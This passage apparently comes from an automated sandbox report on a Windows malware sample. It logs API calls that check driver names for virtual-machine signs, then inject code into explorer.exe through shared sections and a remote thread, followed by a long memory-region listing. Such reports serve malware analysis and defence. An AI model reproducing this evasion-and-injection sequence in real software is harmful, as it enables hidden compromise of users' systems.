_SubStr="vm3dmp") returned 0x0 [0111.319] strstr (_Str="acpiex.sys", _SubStr="vmrawd") returned 0x0 [0111.319] strstr (_Str="acpiex.sys", _SubStr="vmmemc") returned 0x0 [0111.319] strstr (_Str="acpiex.sys", _SubStr="vboxgu") returned 0x0 [0111.319] strstr (_Str="acpiex.sys", _SubStr="vboxsf") returned 0x0 [0111.319] strstr (_Str="acpiex.sys", _SubStr="vboxmo") returned 0x0 [0111.319] strstr (_Str="acpiex.sys", _SubStr="vboxvi") returned 0x0 [0111.319] strstr (_Str="acpiex.sys", _SubStr="vboxdi") returned 0x0 [0111.319] strstr (_Str="acpiex.sys", _SubStr="vioser") returned 0x0 [0111.319] strstr (_Str="wpprecorder.sys", _SubStr="vmci.s") returned 0x0 [0111.319] strstr (_Str="wpprecorder.sys", _SubStr="vmusbm") returned 0x0 [0111.319] strstr (_Str="wpprecorder.sys", _SubStr="vmmous") returned 0x0 [0111.319] strstr (_Str="wpprecorder.sys", _SubStr="vm3dmp") returned 0x0 [0111.320] strstr (_Str="wpprecorder.sys", _SubStr="vmrawd") returned 0x0 [0111.320] strstr (_Str="wpprecorder.sys", _SubStr="vmmemc") returned 0x0 [0111.320] strstr (_Str="wpprecorder.sys", _SubStr="vboxgu") returned 0x0 [0111.320] strstr (_Str="wpprecorder.sys", _SubStr="vboxsf") returned 0x0 [0111.320] strstr (_Str="wpprecorder.sys", _SubStr="vboxmo") returned 0x0 [0111.320] strstr (_Str="wpprecorder.sys", _SubStr="vboxvi") returned 0x0 [0111.320] strstr (_Str="wpprecorder.sys", _SubStr="vboxdi") returned 0x0 [0111.320] strstr (_Str="wpprecorder.sys", _SubStr="vioser") returned 0x0 [0111.320] strstr (_Str="cng.sys", _SubStr="vmci.s") returned 0x0 [0111.320] strstr (_Str="cng.sys", _SubStr="vmusbm") returned 0x0 [0111.320] strstr (_Str="cng.sys", _SubStr="vmmous") returned 0x0 [0111.320] strstr (_Str="cng.sys", _SubStr="vm3dmp") returned 0x0 [0111.320] strstr (_Str="cng.sys", _SubStr="vmrawd") returned 0x0 [0111.320] strstr (_Str="cng.sys", _SubStr="vmmemc") returned 0x0 [0111.320] strstr (_Str="cng.sys", _SubStr="vboxgu") returned 0x0 [0111.320] strstr (_Str="cng.sys", _SubStr="vboxsf") returned 0x0 [0111.320] strstr (_Str="cng.sys", _SubStr="vboxmo") returned 0x0 [0111.322] LocalFree (hMem=0x1d62050) returned 0x0 [0111.322] Sleep (dwMilliseconds=0x1388) [0116.329] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ff1c*=0x0, ZeroBits=0x0, RegionSize=0x19ff24*=0x5200, AllocationType=0x3000, Protect=0x4 | out: BaseAddress=0x19ff1c*=0x1d0000, RegionSize=0x19ff24*=0x6000) returned 0x0 [0116.330] GetShellWindow () returned 0x100cc [0116.330] GetWindowThreadProcessId (in: hWnd=0x100cc, lpdwProcessId=0x19fec8 | out: lpdwProcessId=0x19fec8) returned 0x61c [0116.331] NtOpenProcess (in: ProcessHandle=0x19ff18, DesiredAccess=0x40, ObjectAttributes=0x19ff00*(Length=0x18, RootDirectory=0x0, ObjectName=0x0, Attributes=0x0, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), ClientId=0x19fef8*(UniqueProcess=0x618, UniqueThread=0x0) | out: ProcessHandle=0x19ff18*=0x15c) returned 0x0 [0116.331] NtDuplicateObject (in: SourceProcessHandle=0x15c, SourceHandle=0xffffffff, TargetProcessHandle=0xffffffff, TargetHandle=0x19ff1c, DesiredAccess=0x0, HandleAttributes=0x0, Options=0x2 | out: TargetHandle=0x19ff1c*=0x160) returned 0x0 [0116.331] NtCreateSection (in: SectionHandle=0x19fed4, DesiredAccess=0x6, ObjectAttributes=0x0, MaximumSize=0x19fed8, SectionPageProtection=0x4, AllocationAttributes=0x8000000, FileHandle=0x0 | out: SectionHandle=0x19fed4*=0x164) returned 0x0 [0116.331] NtMapViewOfSection (in: SectionHandle=0x164, ProcessHandle=0xffffffff, BaseAddress=0x19fee4*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x19fef0*=0x5000, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x4 | out: BaseAddress=0x19fee4*=0x1f0000, SectionOffset=0x0, ViewSize=0x19fef0*=0x5000) returned 0x0 [0116.331] NtMapViewOfSection (in: SectionHandle=0x164, ProcessHandle=0x160, BaseAddress=0x19feec*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x19fef0*=0x5000, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x4 | out: BaseAddress=0x19feec*=0x410000, SectionOffset=0x0, ViewSize=0x19fef0*=0x5000) returned 0x0 [0119.927] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x1f0000, nSize=0x104 | out: lpFilename="C:\\Users\\RDhJ0CNFevzX\\Desktop\\6c02cd3294f998736222c255ddd163b9d5e72dfbf3492bfdd43519a46ed609de.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\6c02cd3294f998736222c255ddd163b9d5e72dfbf3492bfdd43519a46ed609de.exe")) returned 0x62 [0119.928] NtCreateSection (in: SectionHandle=0x19fed0, DesiredAccess=0xe, ObjectAttributes=0x0, MaximumSize=0x19fed8, SectionPageProtection=0x40, AllocationAttributes=0x8000000, FileHandle=0x0 | out: SectionHandle=0x19fed0*=0x168) returned 0x0 [0119.929] NtMapViewOfSection (in: SectionHandle=0x168, ProcessHandle=0xffffffff, BaseAddress=0x19fee0*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x19fef0*=0x15200, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x4 | out: BaseAddress=0x19fee0*=0x450000, SectionOffset=0x0, ViewSize=0x19fef0*=0x16000) returned 0x0 [0119.929] NtMapViewOfSection (in: SectionHandle=0x168, ProcessHandle=0x160, BaseAddress=0x19fee8*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x19fef0*=0x16000, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x20 | out: BaseAddress=0x19fee8*=0x420000, SectionOffset=0x0, ViewSize=0x19fef0*=0x16000) returned 0x0 [0119.934] RtlCreateUserThread (in: ProcessHandle=0x160, SecurityDescriptor=0x0, CreateSuspended=0, StackZeroBits=0x0, StackReserve=0x0, StackCommit=0x0, StartAddress=0x421930, Parameter=0x410000, ThreadHandle=0x19fe30*=0xc401d62048, ClientId=0x0 | out: ThreadHandle=0x19fe30*=0x16c, ClientId=0x0) returned 0x0 [0120.035] NtTerminateProcess (ProcessHandle=0xffffffff, ExitStatus=0x0) Thread: id = 4 os_tid = 0xf68 Process: id = "3" image_name = "explorer.exe" filename = "c:\\windows\\explorer.exe" page_root = "0x2b639000" os_pid = "0x618" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "injection" parent_id = "2" os_parent_pid = "0xffffffffffffffff" cmd_line = "C:\\Windows\\Explorer.EXE" cur_dir = "C:\\Windows\\system32\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f4cd" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 382 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 383 start_va = 0x20000 end_va = 0x26fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 384 start_va = 0x30000 end_va = 0x44fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 385 start_va = 0x50000 end_va = 0xcffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 386 start_va = 0xd0000 end_va = 0xd3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 387 start_va = 0xe0000 end_va = 0xe1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000e0000" filename = "" Region: id = 388 start_va = 0xf0000 end_va = 0xf1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 389 start_va = 0x100000 end_va = 0x1bdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 390 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 391 start_va = 0x1d0000 end_va = 0x1d1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 392 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 393 start_va = 0x1f0000 end_va = 0x1f0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 394 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 395 start_va = 0x400000 end_va = 0x400fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 396 start_va = 0x410000 end_va = 0x414fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 397 start_va = 0x480000 end_va = 0x480fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000480000" filename = "" Region: id = 398 start_va = 0x490000 end_va = 0x490fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000490000" filename = "" Region: id = 399 start_va = 0x4a0000 end_va = 0x4a0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004a0000" filename = "" Region: id = 400 start_va = 0x4b0000 end_va = 0x4b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004b0000" filename = "" Region: id = 401 start_va = 0x4c0000 end_va = 0x4c0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004c0000" filename = "" Region: id = 402 start_va = 0x4d0000 end_va = 0x4d3fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.1.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Caches\\cversions.1.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\caches\\cversions.1.db") Region: id = 403 start_va = 0x4e0000 end_va = 0x4f2fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x000000000000000a.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Caches\\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x000000000000000a.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\caches\\{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x000000000000000a.db") Region: id = 404 start_va = 0x500000 end_va = 0x500fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000500000" filename = "" Region: id = 405 start_va = 0x510000 end_va = 0x511fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000510000" filename = "" Region: id = 406 start_va = 0x520000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000520000" filename = "" Region: id = 407 start_va = 0x620000 end_va = 0x638fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{3da71d5a-20cc-432f-a115-dfe92379e91f}.1.ver0x000000000000000c.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Caches\\{3DA71D5A-20CC-432F-A115-DFE92379E91F}.1.ver0x000000000000000c.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\caches\\{3da71d5a-20cc-432f-a115-dfe92379e91f}.1.ver0x000000000000000c.db") Region: id = 408 start_va = 0x640000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000640000" filename = "" Region: id = 409 start_va = 0x650000 end_va = 0x67dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000650000" filename = "" Region: id = 410 start_va = 0x680000 end_va = 0x681fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000680000" filename = "" Region: id = 411 start_va = 0x690000 end_va = 0x691fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000690000" filename = "" Region: id = 412 start_va = 0x6a0000 end_va = 0x6a1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006a0000" filename = "" Region: id = 413 start_va = 0x6b0000 end_va = 0x6b1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006b0000" filename = "" Region: id = 414 start_va = 0x6c0000 end_va = 0x6c1fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "iconcache_idx.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Explorer\\iconcache_idx.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\explorer\\iconcache_idx.db") Region: id = 415 start_va = 0x6d0000 end_va = 0x6d1fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_idx.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_idx.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_idx.db") Region: id = 416 start_va = 0x6e0000 end_va = 0x6e7fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "windows.storage.dll.mui" filename = "\\Windows\\System32\\en-US\\windows.storage.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\windows.storage.dll.mui") Region: id = 417 start_va = 0x700000 end_va = 0x703fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 418 start_va = 0x710000 end_va = 0x71ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000710000" filename = "" Region: id = 419 start_va = 0x720000 end_va = 0x721fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "oleaccrc.dll" filename = "\\Windows\\System32\\oleaccrc.dll" (normalized: "c:\\windows\\system32\\oleaccrc.dll") Region: id = 420 start_va = 0x730000 end_va = 0x733fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000730000" filename = "" Region: id = 421 start_va = 0x740000 end_va = 0x74ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000740000" filename = "" Region: id = 422 start_va = 0x750000 end_va = 0x8d7fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000750000" filename = "" Region: id = 423 start_va = 0x8e0000 end_va = 0xa60fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000008e0000" filename = "" Region: id = 424 start_va = 0xa70000 end_va = 0x1e6ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a70000" filename = "" Region: id = 425 start_va = 0x1e70000 end_va = 0x226afff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e70000" filename = "" Region: id = 426 start_va = 0x2270000 end_va = 0x2271fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_idx.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_idx.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_idx.db") Region: id = 427 start_va = 0x2280000 end_va = 0x2280fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "iconcache_48.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Explorer\\iconcache_48.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\explorer\\iconcache_48.db") Region: id = 428 start_va = 0x2290000 end_va = 0x2291fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "iconcache_idx.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Explorer\\iconcache_idx.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\explorer\\iconcache_idx.db") Region: id = 429 start_va = 0x22a0000 end_va = 0x22a0fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "iconcache_48.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Explorer\\iconcache_48.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\explorer\\iconcache_48.db") Region: id = 430 start_va = 0x22b0000 end_va = 0x22b1fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_idx.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_idx.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_idx.db") Region: id = 431 start_va = 0x22c0000 end_va = 0x22c1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000022c0000" filename = "" Region: id = 432 start_va = 0x22d0000 end_va = 0x22d1fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_idx.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_idx.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_idx.db") Region: id = 433 start_va = 0x22f0000 end_va = 0x236ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000022f0000" filename = "" Region: id = 434 start_va = 0x2370000 end_va = 0x2371fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 435 start_va = 0x2380000 end_va = 0x2397fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{3da71d5a-20cc-432f-a115-dfe92379e91f}.1.ver0x000000000000000d.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Caches\\{3DA71D5A-20CC-432F-A115-DFE92379E91F}.1.ver0x000000000000000d.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\caches\\{3da71d5a-20cc-432f-a115-dfe92379e91f}.1.ver0x000000000000000d.db") Region: id = 436 start_va = 0x23a0000 end_va = 0x23b4fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000023a0000" filename = "" Region: id = 437 start_va = 0x23d0000 end_va = 0x23d0fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "counters.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\INetCache\\counters.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\inetcache\\counters.dat") Region: id = 438 start_va = 0x23e0000 end_va = 0x23e1fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "iconcache_idx.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Explorer\\iconcache_idx.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\explorer\\iconcache_idx.db") Region: id = 439 start_va = 0x23f0000 end_va = 0x23f6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000023f0000" filename = "" Region: id = 440 start_va = 0x2400000 end_va = 0x2401fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002400000" filename = "" Region: id = 441 start_va = 0x2410000 end_va = 0x2410fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002410000" filename = "" Region: id = 442 start_va = 0x2420000 end_va = 0x2420fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002420000" filename = "" Region: id = 443 start_va = 0x2430000 end_va = 0x2430fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002430000" filename = "" Region: id = 444 start_va = 0x2440000 end_va = 0x2441fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002440000" filename = "" Region: id = 445 start_va = 0x2450000 end_va = 0x2451fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002450000" filename = "" Region: id = 446 start_va = 0x2460000 end_va = 0x246ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002460000" filename = "" Region: id = 447 start_va = 0x2470000 end_va = 0x27a6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 448 start_va = 0x27b0000 end_va = 0x288ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Region: id = 449 start_va = 0x2890000 end_va = 0x2890fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "iconcache_256.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Explorer\\iconcache_256.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\explorer\\iconcache_256.db") Region: id = 450 start_va = 0x28a0000 end_va = 0x28affff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000028a0000" filename = "" Region: id = 451 start_va = 0x28b0000 end_va = 0x28b3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000028b0000" filename = "" Region: id = 452 start_va = 0x28c0000 end_va = 0x28c1fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_idx.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_idx.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_idx.db") Region: id = 453 start_va = 0x28e0000 end_va = 0x28e0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000028e0000" filename = "" Region: id = 454 start_va = 0x28f0000 end_va = 0x28f0fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{e23b5da4-e3a9-461b-8050-8e471867b572}.2.ver0x0000000000000001.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{E23B5DA4-E3A9-461B-8050-8E471867B572}.2.ver0x0000000000000001.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{e23b5da4-e3a9-461b-8050-8e471867b572}.2.ver0x0000000000000001.db") Region: id = 455 start_va = 0x2930000 end_va = 0x2933fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 456 start_va = 0x2940000 end_va = 0x2940fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{5c9e180f-34bb-4f92-8676-68c88e410c2b}.2.ver0x0000000000000001.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{5C9E180F-34BB-4F92-8676-68C88E410C2B}.2.ver0x0000000000000001.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{5c9e180f-34bb-4f92-8676-68c88e410c2b}.2.ver0x0000000000000001.db") Region: id = 457 start_va = 0x2950000 end_va = 0x2953fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 458 start_va = 0x2960000 end_va = 0x2960fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{0fa68fff-8d1f-4fcc-b2fc-0c8384cf8d69}.2.ver0x0000000000000001.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{0FA68FFF-8D1F-4FCC-B2FC-0C8384CF8D69}.2.ver0x0000000000000001.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{0fa68fff-8d1f-4fcc-b2fc-0c8384cf8d69}.2.ver0x0000000000000001.db") Region: id = 459 start_va = 0x2970000 end_va = 0x2973fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 460 start_va = 0x2980000 end_va = 0x2980fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{3ec13d2a-c75f-4a0a-9855-0b415d40999c}.2.ver0x0000000000000001.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{3EC13D2A-C75F-4A0A-9855-0B415D40999C}.2.ver0x0000000000000001.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{3ec13d2a-c75f-4a0a-9855-0b415d40999c}.2.ver0x0000000000000001.db") Region: id = 461 start_va = 0x2990000 end_va = 0x2a0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002990000" filename = "" Region: id = 462 start_va = 0x2a10000 end_va = 0x2acbfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002a10000" filename = "" Region: id = 463 start_va = 0x2ad0000 end_va = 0x2bcffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002ad0000" filename = "" Region: id = 464 start_va = 0x2bd0000 end_va = 0x3c0ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "staticcache.dat" filename = "\\Windows\\Fonts\\StaticCache.dat" (normalized: "c:\\windows\\fonts\\staticcache.dat") Region: id = 465 start_va = 0x3c10000 end_va = 0x3c8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003c10000" filename = "" Region: id = 466 start_va = 0x3c90000 end_va = 0x3c90fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003c90000" filename = "" Region: id = 467 start_va = 0x3ca0000 end_va = 0x3ca0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003ca0000" filename = "" Region: id = 468 start_va = 0x3cb0000 end_va = 0x3cb1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003cb0000" filename = "" Region: id = 469 start_va = 0x3cc0000 end_va = 0x3dbffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003cc0000" filename = "" Region: id = 470 start_va = 0x3dc0000 end_va = 0x3dc0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003dc0000" filename = "" Region: id = 471 start_va = 0x3dd0000 end_va = 0x3ddffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003dd0000" filename = "" Region: id = 472 start_va = 0x3de0000 end_va = 0x3deffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003de0000" filename = "" Region: id = 473 start_va = 0x3df0000 end_va = 0x3dfffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003df0000" filename = "" Region: id = 474 start_va = 0x3e00000 end_va = 0x3e00fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003e00000" filename = "" Region: id = 475 start_va = 0x3e10000 end_va = 0x3e10fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003e10000" filename = "" Region: id = 476 start_va = 0x3e20000 end_va = 0x3e20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003e20000" filename = "" Region: id = 477 start_va = 0x3e30000 end_va = 0x3e33fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.1.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Caches\\cversions.1.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\caches\\cversions.1.db") Region: id = 478 start_va = 0x3e40000 end_va = 0x3e40fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003e40000" filename = "" Region: id = 479 start_va = 0x3e50000 end_va = 0x3e50fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003e50000" filename = "" Region: id = 480 start_va = 0x3e60000 end_va = 0x3e60fff monitored = 1 entry_point = 0x0 region_type = 